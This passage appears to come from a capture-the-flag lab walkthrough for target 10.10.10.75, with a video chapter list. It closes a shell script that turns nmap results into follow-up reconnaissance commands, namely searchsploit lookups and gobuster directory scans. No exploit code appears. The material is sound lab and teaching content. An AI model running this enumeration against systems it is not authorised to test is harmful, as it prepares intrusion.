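        out = ""
        for (i = 1; i <= NF; i++) {
            out = (out == "" ? $i : out " " $i)
            if ($i ~ /[0-9]/) break
        }
        print out
    }'
}

# followups: print the commands to run next for each open service.
followups() {
    open_services | while read -r port proto service version; do
        pv=$(product_version "$version")
        printf 'searchsploit "%s"\n' "$pv"
        case "$service" in
            http*)
                # Directory busting plus a manual look with Wappalyzer in the browser.
                printf 'gobuster dir -u http://%s:%s -w %s\n' "$TARGET" "$port" "$WORDLIST"
                printf '# open http://%s:%s in a browser with Wappalyzer to fingerprint the stack\n' "$TARGET" "$port"
                ;;
            ssh)
                printf '# %s/%s ssh: rarely the way in; keep it for credentials found elsewhere\n' "$port" "$proto"
                ;;
        esac
    done
}

followups
```

Run it after replacing GNMAP with a real `nmap -sV -oG - 10.10.10.75` line; the searchsploit queries it emits are deliberately short (product plus version) because overly specific strings, such as the full Ubuntu package suffix, match nothing in the exploit database.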


Chapters (5)

Introduction
1:02 Reviewing the nmap scan
2:52 Using searchsploit to find exploits
5:35 Enumerating and exploiting port 80
19:13 Looking into Linux privilege escalation